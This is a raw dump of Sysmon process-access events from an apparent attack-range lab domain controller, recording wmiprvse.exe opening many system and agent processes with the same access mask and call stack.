15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 